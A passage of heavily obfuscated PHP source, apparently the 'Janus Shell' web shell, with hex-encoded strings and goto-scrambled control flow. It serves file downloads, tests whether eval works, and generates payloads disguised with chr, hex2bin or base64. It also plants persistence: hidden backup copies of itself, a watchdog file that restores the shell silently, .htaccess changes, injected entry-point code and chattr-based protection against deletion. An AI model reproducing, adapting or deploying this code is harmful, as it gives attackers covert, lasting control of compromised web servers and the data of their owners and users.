\x73\x2d\150\144\x64\42\x3e\55\55\x3c\x2f\x73\160\141\x6e\76\74\57\144\151\x76\x3e\xa\x9\x9\x9\x3c\x64\x69\166\x20\x63\x6c\141\163\163\75\x22\163\x79\163\55\151\x6e\x66\157\55\151\164\x65\155\x22\x3e\x3c\x73\164\162\x6f\x6e\x67\76\117\160\145\x6e\137\142\141\x73\145\x64\x69\x72\72\74\57\x73\164\162\157\x6e\147\x3e\40\x3c\x73\160\141\156\x20\151\x64\x3d\x22\163\x79\x73\55\x62\141\163\x65\144\x69\162\x22\x20\x73\164\x79\154\x65\75\42\x63\157\154\157\x72\x3a\166\141\x72\50\55\55\x61\x63\x63\145\x6e\164\x2d\147\162\145\145\x6e\x29\x3b\x22\x3e\116\x4f\x4e\x45\x3c\57\x73\160\x61\156\76\x3c\x2f\x64\x69\166\x3e\xa\11\x9\x9\74\144\x69\166\x20\143\154\141\x73\x73\75\42\163\171\163\55\x69\x6e\x66\157\x2d\x69\x74\145\155\x22\x3e\x3c\163\164\162\x6f\x6e\147\76\120\127\x44\x3a\74\57\x73\164\x72\x6f\156\x67\x3e\x20\x3c\163\160\141\x6e\x20\x69\x64\x3d\x22\163\171\x73\55\160\x77\144\42\76\55\x2d\x3c\x2f\163\x70\141\x6e\76\74\57\x64\x69\x76\76\12\x9\11\x3c\57\144\151\166\x3e\xa\11\11\x3c\144\151\166\x20\x63\154\141\163\x73\75\42\x73\171\163\x2d\151\156\x66\157\55\162\x69\x67\x68\164\42\x3e\xa\x9\x9\x9\74\144\x69\x76\x20\x63\154\x61\163\163\x3d\x22\152\141\x6e\x75\163\55\x6c\157\x67\157\55\143\157\x6e\164\x61\x69\156\145\x72\42\76\xa\11\11\x9\11\x3c\160\162\x65\x20\143\154\x61\163\x73\x3d\x22\x6a\141\x6e\165\x73\x2d\x6c\157\x67\x6f\42\x3e\x20\x20\40\x20\x7c\x20\x20\40\40\174\x5f\137\137\x5f\x20\40\40\40\137\137\137\137\x20\40\137\137\x20\x5f\x5f\x20\40\137\x5f\x5f\137\x5f\x5f\12\40\x20\40\x20\x7c\40\x20\x20\40\134\x5f\x5f\40\x20\x5c\40\x20\57\x20\x20\x20\40\134\174\40\40\174\x20\x20\x5c\57\40\40\x5f\x5f\137\x2f\xa\57\134\137\x5f\x7c\x20\x20\40\40\x7c\x2f\x20\x5f\x5f\x20\134\174\40\40\40\x20\x7c\x20\x20\134\x20\40\174\x20\40\57\x5c\137\137\137\40\134\12\134\137\137\x5f\x5f\137\x5f\137\x5f\50\137\137\x5f\137\40\x20\x2f\137\137\137\174\40\x20\57\137\137\137\x5f\x2f\x2f\137\x5f\x5f\x5f\40\x20\76\xa\x20\40\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\134\x2f\x20\x20\40\x20\x20\x20\134\x2f\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x5c\x2f\x3c\x2f\x70\162\145\76\xa\x9\x9\x9\11\74\x64\x69\166\40\x63\154\x61\x73\x73\75\42\x6a\141\x6e\x75\163\55\x76\145\162\163\151\157\156\x22\x3e\112\141\x6e\x75\x73\40\123\x68\145\154\154\x20\166"; goto vKpYY; dKlZH: echo __FILE__; goto v70w0; jTnIY: flush(); goto YEa1Z; sHjTd: if (isset($_SESSION["\x6a\141\156\x75\x73\137\x61\x75\x74\150\x65\x6e\164\x69\x63\x61\x74\x65\144"])) { goto GZQX6; } goto wwxco; UsKhM: CZSD2: goto S6BO2; Zub6s: ob_clean(); goto pmuGk; CrrfL: if (!is_dir($_SESSION["\143\167\144"])) { goto OwxwL; } goto E_DtZ; BpwNN: ob_clean(); goto i1a8p; jeT10: ASfNK: goto ErYmH; uhRVq: if (!(is_file($Q0s1i) && is_readable($Q0s1i))) { goto qhSZg; } goto dPCRl; ErYmH: bThLh: goto vECbI; bmy9w: @ignore_user_abort(true); goto bJ2m9; BE0ri: function O1UOT($dwgDQ) { goto PfbrV; t5VQH: goto ZR2b_; goto F8M3B; PfbrV: if (!($dwgDQ == 0)) { goto i8Aqc; } goto K1LBT; F8M3B: sRvKS: goto i0FyS; K1LBT: return "\x30\x20\102"; goto e34KY; i0FyS: return round($dwgDQ, 2) . "\40" . $REfT6[$jY45d]; goto DPsK9; y6haT: $dwgDQ /= 1024; goto A0hY3; oLQ2F: if (!($dwgDQ >= 1024 && $jY45d < 4)) { goto sRvKS; } goto y6haT; A0hY3: $jY45d++; goto t5VQH; kBzd3: ZR2b_: goto oLQ2F; GKn3b: $REfT6 = ["\102", "\x4b\x42", "\x4d\102", "\107\102", "\124\102"]; goto eIN3t; e34KY: i8Aqc: goto GKn3b; eIN3t: $jY45d = 0; goto kBzd3; DPsK9: } goto fBS2k; jLTgu: function nZ_aT($siOBH) { goto E8a6z; aDWow: kensD: goto rEIiI; E8a6z: $yDKeU = YwbXs($siOBH); goto t4Aq2; t4Aq2: if (!($yDKeU !== false && !empty($yDKeU))) { goto kensD; } goto Ry50I; Ry50I: return $yDKeU; goto aDWow; rEIiI: return base64_decode($siOBH); goto KkDbI; KkDbI: } goto woHxu; UThDD: echo __FILE__; goto BNW98; mxnF5: ro08K: goto zQzfB; LS4iM: header("\x43\157\156\x74\145\x6e\x74\55\114\145\x6e\147\164\x68\x3a\40" . filesize($Q0s1i)); goto aqr3A; Q9FIj: header("\x43\157\156\x74\x65\156\x74\x2d\104\151\x73\160\157\x73\151\x74\x69\157\156\x3a\40\x61\x74\164\x61\x63\x68\x6d\145\x6e\x74\73\40\146\x69\154\145\x6e\141\155\x65\x3d\42" . $YOfeG . "\42"); goto dufTU; L4CfJ: exit; goto mxnF5; vtjgK: $_GET["\141\143\164\x69\157\156"] = $VtInv; goto uwI21; lw9o7: function IcVUi($j3_hR) { goto kCSiW; R_E3G: return $p2RFD; goto TTjQL; jHE4q: if (is_dir($j3_hR)) { goto DIpea; } goto R_E3G; DDMUP: foreach ($yPpFX as $Q0s1i) { goto MQEON; SAEA9: k2z5J: goto rfBXj; CC2qg: $p2RFD[$Q0s1i->getRealPath()] = $Q0s1i->getMTime(); goto lEdG3; MQEON: if (!$Q0s1i->isFile()) { goto Pswee; } goto CC2qg; lEdG3: Pswee: goto SAEA9; rfBXj: } goto f8Z1G; kCSiW: $p2RFD = []; goto jHE4q; TTjQL: DIpea: goto o3Tpa; nCtPR: return $p2RFD; goto hOhlW; o3Tpa: $yPpFX = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($j3_hR, RecursiveDirectoryIterator::SKIP_DOTS)); goto DDMUP; f8Z1G: D3ZM3: goto nCtPR; hOhlW: } goto Dt0h7; eQjwx: function mrzr7($MTLTy) { goto KLMad; oat1B: return $zzIgE[$LyaNr]($MTLTy); goto WEjcP; KLMad: $zzIgE = ["\x63\150\x72" => function ($CnnQw) { goto lT_gz; UHSYI: $olRGv .= "\x63\150\162\50" . ord($CnnQw[$jY45d]) . "\x29\x2e"; goto o_dxa; o_dxa: Z5RqB: goto tUPWa; ODfUD: $jY45d = 0; goto wru1I; exthK: JHwiY: goto HUKD3; kx6f1: if (!($jY45d < strlen($CnnQw))) { goto JHwiY; } goto UHSYI; lT_gz: $olRGv = ''; goto ODfUD; wamAK: goto US_3V; goto exthK; HUKD3: return rtrim($olRGv, "\56"); goto Ip0Hl; tUPWa: $jY45d++; goto wamAK; wru1I: US_3V: goto kx6f1; Ip0Hl: }, "\150\145\170" => function ($CnnQw) { return "\x68\145\170\x32\x62\151\156\x28\42" . bin2hex($CnnQw) . "\x22\x29"; }, "\142\141\x73\x65\66\64" => function ($CnnQw) { return "\x62\141\x73\145\66\x34\137\x64\145\x63\x6f\144\x65\x28\x22" . base64_encode($CnnQw) . "\x22\51"; }]; goto kYHZP; kYHZP: $LyaNr = array_rand($zzIgE); goto oat1B; WEjcP: } goto nAaIX; SjMBd: if (is_file($KLrez) && is_readable($KLrez)) { goto OKXVT; } goto tx817; Y0ORL: error_reporting(E_ALL); goto aUrjg; XMIbA: $VtInv = $sv0qE["\x61\143\x74\x69\157\156"]; goto BQ3tx; tN4Ke: if (!($_SERVER["\x52\x45\x51\125\105\x53\124\137\x4d\x45\x54\x48\117\104"] === "\120\117\123\x54")) { goto ASfNK; } goto G1ubf; sJvYj: exit; goto gat24; MKZxY: exit; goto ZCKYK; tvKy0: ywOyc: goto JWnTN; i1a8p: header("\x43\157\156\x74\x65\156\x74\x2d\x54\x79\x70\145\x3a\x20\x74\145\170\164\x2f\160\x6c\x61\x69\156\73\x20\x63\150\x61\x72\x73\x65\x74\x3d\x75\164\146\55\70"); goto u64K3; lE63w: $jJ93R = dirname($zJsLG) . DIRECTORY_SEPARATOR . "\x2e\150\164\141\x63\143\x65\x73\163"; goto eVoXz; zQzfB: function lIX3f($zME47) { goto fIDFD; CKr0U: return !in_array($zME47, $DqyA2); goto ko2Q1; nWoLS: if (!($va_Te !== null)) { goto o3kYA; } goto p_kE5; RBZp3: LVWyE: goto CKr0U; p_kE5: restore_error_handler(); goto lObFb; E2mhS: $olRGv = false; goto pZZZm; pZZZm: try { $YX5QN = @eval("\162\x65\164\165\162\156\x20\164\x72\x75\145\x3b"); $olRGv = $YX5QN !== false; } catch (Throwable $smUM0) { $olRGv = false; } catch (Exception $smUM0) { $olRGv = false; } goto nWoLS; w3W9j: $ajFWl = ini_get("\144\x69\x73\160\154\x61\x79\137\145\162\x72\x6f\162\x73"); goto YeRxZ; YeRxZ: ini_set("\x64\x69\x73\x70\x6c\141\171\x5f\145\162\162\x6f\x72\x73", 0); goto PW_km; bQJfv: error_reporting($kxMRq); goto uf6u4; ZaKSY: if (!($zME47 === "\x65\x76\141\x6c")) { goto LVWyE; } goto uZACc; uf6u4: ini_set("\x64\151\x73\x70\x6c\x61\171\137\145\x72\x72\157\162\163", $ajFWl); goto zxG_H; lObFb: o3kYA: goto bQJfv; fIDFD: global $DqyA2; goto ZaKSY; uZACc: $kxMRq = error_reporting(0); goto w3W9j; zxG_H: return $olRGv; goto RBZp3; PW_km: $va_Te = set_error_handler(function () { return true; }, E_ALL); goto E2mhS; ko2Q1: } goto g1ntD; dPCRl: header("\103\x6f\x6e\x74\145\156\x74\x2d\104\x65\163\x63\x72\151\x70\x74\151\157\x6e\72\40\106\151\x6c\145\40\x54\162\141\x6e\163\146\145\x72"); goto Xvcad; w5UuY: session_start(); goto FBVkD; aI1tU: echo __FILE__; goto ZOYnz; R_mq2: header("\103\x6f\x6e\x74\x65\156\x74\x2d\104\x69\x73\160\x6f\x73\151\164\x69\x6f\x6e\72\x20\x61\x74\164\141\x63\150\155\x65\156\x74\73\x20\146\x69\x6c\145\x6e\x61\x6d\145\x3d\42" . basename($Q0s1i) . "\42"); goto LS4iM; d6MLE: $_SESSION["\x6a\141\156\x75\163\137\x61\x75\x74\150\145\156\x74\x69\143\x61\164\x65\144"] = true; goto DLAoq; tP2j0: $Q0s1i = $_GET["\x64\157\x77\156\154\x6f\141\144"]; goto uhRVq; PXxpd: exit; goto LUJ5x; CO2pQ: echo __FILE__; goto k2uXR; QpAaL: function A3X6D($qY16M, $etpkF, $Yxoh6) { goto ASe0E; KTfUO: unset($kmHPp); goto ZoXXA; dswNI: zn2ER: goto kZBC9; jX9m3: return true; goto viM1Y; ZoXXA: usleep(300000); goto rNvbM; YWKfM: if (!($iAcp7 && preg_match("\x2f\x62\141\163\145\66\64\x5f\x64\x65\143\x6f\x64\145\134\50\x27\50\133\x5e\x27\x5d\x2b\x29\x27\x5c\51\57", $iAcp7, $I5WkF))) { goto DDj0v; } goto XMH9a; lBl0H: $iAcp7 = @file_get_contents($etpkF); goto YWKfM; fVKFL: J3mK1: goto O_1YB; rXE4q: @(include_once $Yxoh6); goto iXJim; iXJim: usleep(300000); goto RPwqO; hW2yD: return false; goto rt1FV; hcjTm: @(include_once $etpkF); goto KTfUO; J3Dob: DDj0v: goto dswNI; YJ18S: @chmod($qY16M, 0644); goto gw4T0; XMH9a: $cO3xb = @base64_decode($I5WkF[1]); goto I11S7; viM1Y: P1McX: goto ZDqSr; QSPG1: SoxkV: goto J3Dob; ASe0E: if (!file_exists($qY16M)) { goto P1McX; } goto jX9m3; RGktc: NHMS7: goto fVKFL; kfKZx: $kmHPp = true; goto hcjTm; gw4T0: return true; goto QSPG1; ia2bq: return true; goto TOpEo; I11S7: if (!($cO3xb && @file_put_contents($qY16M, $cO3xb))) { goto SoxkV; } goto YJ18S; QPgRW: RBwDn: goto hW2yD; ZDqSr: if (!file_exists($etpkF)) { goto zn2ER; } goto lBl0H; O_1YB: if (!file_exists($Yxoh6)) { goto RBwDn; } goto rXE4q; rNvbM: if (!file_exists($qY16M)) { goto NHMS7; } goto GggUg; RPwqO: if (!file_exists($qY16M)) { goto xZVO9; } goto ia2bq; TOpEo: xZVO9: goto QPgRW; GggUg: return true; goto RGktc; kZBC9: if (!file_exists($etpkF)) { goto J3mK1; } goto kfKZx; rt1FV: } goto LIRkT; fBS2k: function lceo0($Q0s1i) { return substr(sprintf("\45\x6f", fileperms($Q0s1i)), -4); } goto EJ3iq; Xs3PZ: if (!empty($_SESSION["\143\167\144"])) { goto ywOyc; } goto NC6ql; uwI21: XBHMN: goto UsKhM; j1yik: SDVmw: goto PTVFj; wwxco: GZQX6: goto D6lxJ; P_nPu: $Yxoh6 = dirname($zJsLG) . DIRECTORY_SEPARATOR . "\x2e\152\x61\156\x75\163\137\142\x61\143\x6b\165\160\137" . substr(md5($zJsLG), 0, 12) . "\56\160\x68\x70"; goto QpAaL; D6lxJ: S6XqA: goto TEtnR; xLdqa: if (!file_exists($fzeLt)) { goto bThLh; } goto hEZ4X; eFZn3: kobqQ: goto dxABb; wCGPY: function TD36N($qY16M) { goto JNjEx; mQjyg: $CwVuG .= "\40\40\x20\40\x24\x6a\x61\x6e\x75\163\x5f\167\141\164\143\150\x64\157\147\137\x66\x69\154\145\x5f\x63\150\x65\143\153\40\75\x20\137\137\104\x49\x52\x5f\x5f\x20\56\x20\104\111\x52\105\x43\x54\x4f\122\x59\137\x53\x45\120\101\x52\101\x54\x4f\122\x20\56\40\x27" . addslashes(basename($etpkF)) . "\x27\x3b\12"; goto ZwkEI; LTrwX: $iAcp7 .= "\40\40\40\40\40\x20\40\x20\x7d\xa"; goto nIQNO; kXocN: $iAcp7 .= "\x2f\x2f\40\112\x61\156\x75\163\x20\x57\x61\x74\x63\150\x64\x6f\x67\x20\x2d\x20\101\165\164\x6f\x20\122\145\x73\164\157\x72\x65\40\123\x79\163\164\145\x6d\40\50\x53\x54\x41\x4e\104\x41\114\x4f\116\x45\51\12"; goto eHSc0; M9kZV: eUge4: goto SqRrg; cqP2M: $iAcp7 .= "\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x20\40\151\146\40\50\x69\x73\137\x65\170\x65\x63\x75\x74\141\142\154\145\x28\47\x2f\x75\163\x72\57\142\x69\x6e\x2f\x63\x68\141\x74\164\x72\47\x29\x29\40\x7b\12"; goto uKNbI; swWK8: $kDxDn .= "\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\44\x72\x65\x71\165\145\x73\x74\137\x75\x72\151\x20\x3d\x20\162\x74\162\x69\x6d\x28\44\x72\x65\x71\165\145\x73\x74\x5f\x75\162\x69\x2c\40\x27\x2f\x27\51\x20\56\x20\x27\57\x27\x20\x2e\40\47" . addslashes($nZiB9) . "\x27\x3b\xa"; goto zgu1p; loRui: $iAcp7 .= "\40\40\x20\40\x2f\x2f\40\x4d\x65\x74\x68\x6f\144\x20\x33\72\x20\x43\x61\x72\151\x20\142\x61\x63\153\x75\160\40\144\151\x20\160\141\x72\145\x6e\x74\x20\144\x69\162\145\x63\164\157\x72\x79\xa"; goto HApoL; TlPCF: $kDxDn .= "\x20\x20\x20\x20\57\x2f\x20\115\x65\164\x68\157\x64\x20\63\x3a\x20\111\x6e\x63\x6c\x75\144\x65\40\142\x61\x63\153\x75\160\40\x66\x69\x6c\x65\12"; goto OAUF_; ET_34: $CwVuG .= "\x20\40\40\40\x20\40\40\40\x24\x6a\x61\156\165\x73\137\x6e\157\137\x72\145\x64\x69\x72\x65\143\164\x20\x3d\x20\x74\x72\x75\145\73\40\57\57\x20\106\x6c\x61\147\40\165\156\x74\165\153\x20\160\x72\x65\166\145\156\x74\x20\x72\145\x64\151\162\145\x63\164\40\163\141\141\164\40\x69\156\x63\154\165\x64\145\12"; goto nhEV3; tx9A5: $kDxDn .= "\xa"; goto Jg2o2; vObW6: $iAcp7 .= "\40\40\40\40\x20\40\40\40\x20\x20\40\40\57\57\40\123\x65\164\x20\146\x69\x6c\x65\40\141\x74\164\162\x69\142\x75\x74\x65\163\x20\165\x6e\x74\165\153\40\x70\x72\145\x76\x65\156\164\40\x64\x65\x6c\145\x74\145\x20\x28\x6a\x69\x6b\141\x20\x73\x75\x70\160\x6f\162\164\x65\144\51\12"; goto teFf4; nQxya: @file_put_contents($qY16M, $QQjf9); goto PSDbM; O3mrL: $iAcp7 .= "\44\155\141\151\156\137\x73\x68\145\x6c\x6c\x20\75\40\137\137\104\111\x52\x5f\x5f\40\x2e\40\x44\111\x52\105\x43\x54\117\122\x59\x5f\x53\105\120\101\x52\x41\124\x4f\x52\40\x2e\40\x27" . addslashes($nZiB9) . "\x27\x3b\xa"; goto eaUtA; CW7wD: $kDxDn .= "\175\12"; goto y4btD; w1ayN: $iAcp7 .= "\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\40\44\162\145\x71\x75\x65\x73\164\x5f\165\162\x69\40\x3d\40\144\x69\162\x6e\x61\155\x65\50\44\162\x65\x71\165\x65\x73\x74\137\x75\162\151\x29\40\x2e\40\47\57\47\x20\x2e\40\x27" . addslashes($nZiB9) . "\x27\73\12"; goto uUQyy; w6VN3: $qtLdM .= "\x69\x66\x20\x28\x21\x66\x69\154\145\x5f\145\x78\x69\x73\x74\163\x28\44\164\x61\162\x67\x65\x74\x5f\146\x69\x6c\x65\x29\x29\40\x7b\xa"; goto VO0tO; YLnxB: $CwVuG .= "\175\51\x3b\xa"; goto WZVj4; pQu2K: $CwVuG .= "\x20\40\x20\40\40\x20\40\x20\57\x2f\x20\111\x6e\x63\154\165\144\145\x20\x77\141\x74\x63\150\144\157\x67\40\x75\156\164\x75\x6b\40\162\x65\163\x74\157\162\x65\54\40\x74\x61\x70\x69\40\160\x72\145\x76\x65\156\x74\x20\x72\x65\x64\151\162\145\143\164\x20\x64\145\x6e\x67\141\x6e\40\146\154\x61\x67\12"; goto ET_34; N360a: $qtLdM .= "\44\164\x61\x72\x67\145\x74\x5f\x66\x69\x6c\x65\x20\75\40\137\137\104\111\x52\x5f\x5f\x20\x2e\40\104\x49\x52\x45\103\124\117\x52\131\x5f\x53\x45\120\x41\x52\101\x54\x4f\122\x20\56\40\47" . addslashes($nZiB9) . "\x27\x3b\12"; goto b8Yhy; q0wMs: $kDxDn .= "\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x69\146\x20\50\x69\x73\163\x65\x74\x28\44\x5f\x53\x45\122\x56\x45\x52\x5b\x27\x51\125\x45\122\x59\137\x53\x54\122\x49\116\107\47\135\x29\x20\x26\x26\40\x21\145\x6d\x70\164\x79\50\x24\137\123\x45\x52\126\x45\x52\133\47\x51\x55\105\122\x59\x5f\x53\124\x52\x49\116\x47\47\135\x29\x29\x20\x7b\12"; goto jog5g; r80AR: $olDPG = @file_get_contents($qY16M); goto PYHZe; brYfx: $CwVuG .= "\40\x20\x20\40\x7d\12"; goto YLnxB; Oft33: $kDxDn .= "\x2f\x2f\40\112\141\x6e\165\163\40\105\156\x74\x72\171\x20\x50\157\151\156\164\40\55\40\101\x75\x74\157\x20\122\x65\163\x74\157\162\x65\40\123\171\x73\x74\x65\x6d\xa"; goto qVzco; bsrGN: $CwVuG .= "\x20\40\40\x20\x7d\12"; goto Yjtj9; na0W3: L_Zc5: goto EB94f; x8xYY: $iAcp7 .= "\x20\40\x20\40\57\x2f\x20\110\x61\156\171\141\40\162\145\x64\x69\162\145\143\x74\40\x6a\x69\x6b\141\x20\x66\x69\x6c\145\40\x69\156\x69\x20\144\151\x61\x6b\163\145\163\x20\154\x61\x6e\147\163\x75\156\x67\x2c\x20\x62\165\x6b\x61\156\40\x76\151\x61\40\x69\x6e\x63\x6c\165\x64\145\12"; goto c03UG; Vm2Af: $iAcp7 .= "\40\x20\x20\40\151\146\40\x28\41\44\x72\145\163\x74\x6f\162\x65\144\x20\46\x26\x20\146\x69\154\x65\x5f\x65\x78\x69\163\164\x73\50\x24\x62\141\143\x6b\x75\x70\137\146\151\x6c\x65\51\x29\40\173\xa"; goto Ymlbi; P8hm3: $CwVuG .= "\x20\x20\x20\40\151\x66\x20\x28\x66\151\x6c\145\137\145\x78\151\163\x74\x73\x28\x24\152\x61\156\x75\x73\x5f\167\x61\164\143\x68\144\x6f\x67\137\146\x69\x6c\x65\51\x29\40\173\12"; goto d0MW1; DD20I: $iAcp7 .= "\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x7d\12"; goto uUoxQ; vepzk: $kDxDn .= "\40\40\40\40\x20\40\40\x20\x20\40\40\40\x68\x65\x61\x64\145\x72\x28\x27\x4c\x6f\143\x61\164\151\x6f\x6e\x3a\40\47\40\56\40\44\x72\x65\x64\x69\162\145\x63\x74\137\165\x72\x6c\54\40\164\x72\x75\x65\54\40\63\x30\x32\x29\73\xa"; goto qUctw; iBnsm: $kDxDn .= "\151\x66\x20\50\x70\150\160\x5f\163\141\160\151\x5f\x6e\x61\x6d\x65\50\x29\40\41\75\x3d\40\47\143\154\151\47\x20\x26\x26\40\151\163\163\145\164\x28\44\x5f\x53\105\x52\x56\x45\x52\133\x27\122\x45\121\125\105\123\124\x5f\x4d\x45\x54\x48\117\x44\47\x5d\x29\x20\x26\x26\40\x62\x61\163\145\x6e\141\x6d\x65\50\x24\x5f\123\x45\x52\126\x45\x52\x5b\47\123\103\122\111\120\x54\137\116\x41\115\x45\47\x5d\51\40\x3d\75\75\40\x27\x69\156\x64\x65\170\56\160\x68\x70\x27\x29\x20\x7b\12"; goto gFHYQ; G_3HQ: $CwVuG .= "\x20\x20\x20\x20\x7d\xa"; goto im6BN; Vm4bE: $kDxDn .= "\x20\40\x20\40\x20\x20\40\40\175\xa"; goto tTxj9; yeZqq: $CwVuG .= "\57\57\40\x45\156\x73\x75\x72\x65\40\142\141\143\x6b\x75\160\x20\x65\x78\151\163\164\x73\x20\144\x61\x6e\x20\x76\141\154\151\x64\12"; goto ObKKY; w8sM5: $iAcp7 .= "\44\x73\150\x65\154\x6c\x5f\x64\x61\x74\x61\x20\x3d\x20\x62\141\x73\145\66\x34\x5f\144\x65\x63\157\x64\x65\x28\47" . base64_encode($olDPG) . "\47\x29\73\xa"; goto e0Iuf; KecN8: $kDxDn .= "\x20\40\40\40\40\40\x20\x20\40\40\40\40\175\12"; goto vepzk; XCNVA: $kDxDn .= "\x20\40\x20\x20\40\40\40\x20\x2f\57\40\x50\162\x65\166\x65\x6e\x74\x20\162\x65\x64\x69\x72\145\143\164\x20\x6c\157\157\160\x20\55\40\x63\x68\x65\143\x6b\40\152\151\153\141\40\163\165\x64\141\150\40\144\x69\40\x73\150\145\154\x6c\40\165\x74\x61\x6d\x61\xa"; goto RLCPK; SoIS2: $iAcp7 .= "\40\40\40\40\x20\x20\x20\40\57\57\x20\x52\x65\155\x6f\x76\145\40\167\141\x74\143\x68\x64\157\147\40\x66\x69\154\x65\x6e\141\x6d\x65\40\x64\x61\162\x69\40\125\122\111\xa"; goto Elpjs; vcB17: $iAcp7 .= "\x20\40\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\175\12"; goto MUFKr; lNGjn: $kDxDn .= "\57\x2f\x20\112\151\x6b\x61\x20\x6d\141\163\x69\x68\x20\x74\151\x64\141\x6b\x20\x61\144\x61\40\x73\145\x74\145\154\x61\150\x20\x73\145\155\x75\141\40\155\145\164\150\157\144\x2c\x20\x73\x68\x6f\167\40\x65\x72\162\157\162\12"; goto aU_Xk; lc8SP: $CwVuG .= "\x7d\xa"; goto pfvvb; zgu1p: $kDxDn .= "\40\40\x20\x20\x20\40\40\x20\x7d\40\x65\x6c\163\145\40\173\xa"; goto tnXGP; YPZ3h: $kDxDn .= "\x24\142\141\x63\x6b\165\x70\137\146\151\154\x65\40\75\40\137\137\x44\111\x52\x5f\137\40\56\x20\x44\x49\122\x45\x43\124\117\122\131\137\123\105\120\101\122\x41\124\x4f\x52\40\56\x20\47" . addslashes($erYaC) . "\47\73\12"; goto Af26e; JhVGv: $kDxDn .= "\40\x20\x20\40\x65\170\x69\164\73\12"; goto e6Jpl; atzEe: $kDxDn .= "\x20\x20\40\x20\12"; goto Lfn7X; eHSc0: $iAcp7 .= "\57\57\40\x46\151\154\145\x20\x69\156\151\40\x53\124\x41\116\x44\101\x4c\x4f\x4e\105\x20\55\x20\144\x61\x70\x61\164\40\144\151\141\153\163\145\x73\x20\x6c\141\x6e\x67\163\165\156\x67\x20\166\x69\x61\x20\x48\124\124\x50\40\165\156\164\165\x6b\40\162\145\x73\x74\157\x72\145\12"; goto MEAUU; vrids: $iAcp7 .= "\40\x20\40\x20\40\x20\40\x20\175\xa"; goto OLg0o; GEh5N: $iAcp7 .= "\40\40\x20\x20\x20\40\x20\40\x24\167\162\151\164\145\x5f\x72\145\163\x75\154\x74\40\x3d\x20\100\146\x69\154\x65\x5f\160\x75\x74\137\143\157\156\x74\x65\x6e\164\x73\x28\44\x6d\141\x69\156\x5f\163\150\145\154\x6c\54\40\x24\x73\x68\x65\x6c\x6c\137\144\141\x74\141\51\x3b\12"; goto hwoXC; XeYb5: $iAcp7 .= "\40\x20\40\40\x20\40\40\x20\145\x78\x69\x74\73\12"; goto JblDh; x6Ntr: if (@file_put_contents($etpkF, $iAcp7)) { goto eUge4; } goto wZWFz; vud50: $kDxDn .= "\40\x20\x20\40\x20\40\x20\40\40\40\40\40\x7d\xa"; goto Pv8o4; im6BN: $CwVuG .= "\40\40\x20\40\57\x2f\40\112\x69\x6b\x61\x20\x6d\141\x73\x69\x68\40\x74\151\x64\x61\x6b\x20\141\144\x61\54\40\x63\157\x62\141\x20\142\x61\143\x6b\x75\160\x20\146\x69\154\x65\xa"; goto GeeYw; qVzco: $kDxDn .= "\x2f\57\40\106\x69\x6c\145\40\x69\x6e\x69\x20\141\x6b\x61\x6e\40\163\145\154\x61\154\165\40\143\150\x65\x63\x6b\40\x64\141\x6e\x20\162\x65\x73\x74\x6f\x72\145\40\x73\150\x65\x6c\154\x20\x6a\x69\x6b\141\x20\144\151\150\x61\160\x75\163\xa"; goto TWHqJ; i0JsC: $iAcp7 .= "\40\40\x20\40\x20\40\x20\40\57\x2f\x20\x50\x61\163\x74\151\x6b\x61\x6e\x20\x55\x52\x49\x20\x6d\145\x6e\147\x61\162\141\150\x20\x6b\145\x20\x73\x68\x65\x6c\x6c\x20\146\x69\154\145\156\141\x6d\145\12"; goto FjKg3; QORMq: $CwVuG .= "\x20\40\x20\x20\x2f\57\40\x54\x72\151\147\147\145\162\40\167\141\164\x63\x68\144\x6f\147\x20\x75\156\x74\165\x6b\40\162\x65\x73\164\x6f\x72\145\12"; goto P8hm3; rdVd9: $CwVuG .= "\x24\x6a\x61\x6e\165\163\137\x77\x61\164\x63\x68\144\x6f\147\137\x66\x69\154\x65\40\x3d\40\x5f\137\x44\x49\x52\x5f\x5f\x20\56\x20\104\x49\x52\x45\103\124\x4f\122\131\x5f\123\x45\120\x41\122\101\124\x4f\122\40\56\x20\x27" . addslashes(basename($etpkF)) . "\47\x3b\xa"; goto MORes; kiSRS: $CwVuG .= "\40\x20\x20\x20\151\146\40\50\146\151\x6c\x65\137\x65\x78\151\x73\x74\163\x28\44\x6a\x61\156\x75\x73\x5f\x77\x61\x74\x63\150\144\157\147\x5f\x66\151\x6c\145\51\x29\x20\173\12"; goto pQu2K; Osa1W: $CwVuG .= "\40\40\x20\x20\57\x2f\x20\123\150\x65\154\x6c\40\164\151\144\x61\153\40\141\144\141\x20\x2d\40\x74\x72\151\147\x67\x65\162\x20\162\x65\x73\164\157\x72\x65\x20\151\155\x6d\145\144\151\141\x74\145\x6c\171\40\50\x73\151\x6c\x65\x6e\164\x2c\x20\x6e\x6f\x20\162\145\x64\151\x72\x65\x63\x74\51\xa"; goto kiSRS; j2GPj: $iAcp7 .= "\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x20\145\170\x69\164\73\12"; goto pDHWL; MGqhx: $iAcp7 .= "\40\40\x20\40\x20\x20\40\x20\x24\x72\145\x71\x75\145\x73\x74\x5f\165\x72\151\40\75\x20\x70\162\145\x67\137\x72\145\x70\x6c\x61\143\x65\x28\47\x23\57\151\156\x64\145\170\134\x2e\160\150\160\50\57\x7c\x24\x29\x23\47\x2c\40\x27\57\x27\x2c\40\x24\x72\x65\x71\x75\145\163\164\x5f\x75\162\151\51\73\12"; goto EuNVd; eaUtA: $iAcp7 .= "\x24\x62\x61\143\153\165\x70\x5f\146\151\x6c\x65\40\75\x20\137\x5f\x44\x49\122\137\137\40\56\x20\x44\111\122\x45\x43\x54\117\122\x59\x5f\x53\105\x50\x41\x52\101\x54\x4f\x52\40\56\x20\x27" . addslashes($erYaC) . "\x27\73\xa"; goto w8sM5; e9gVv: $iAcp7 .= "\40\40\40\x20\40\x20\x20\40\x24\x72\x65\x71\165\x65\x73\x74\x5f\165\162\151\x20\75\x20\151\163\163\x65\x74\x28\x24\137\x53\x45\122\126\x45\122\x5b\x27\x52\105\121\125\105\x53\124\137\125\x52\x49\47\x5d\x29\x20\x3f\x20\44\x5f\x53\105\122\x56\105\x52\x5b\47\x52\x45\x51\x55\x45\123\124\x5f\125\x52\111\x27\135\40\72\40\x27\57\47\x20\x2e\x20\47" . addslashes($nZiB9) . 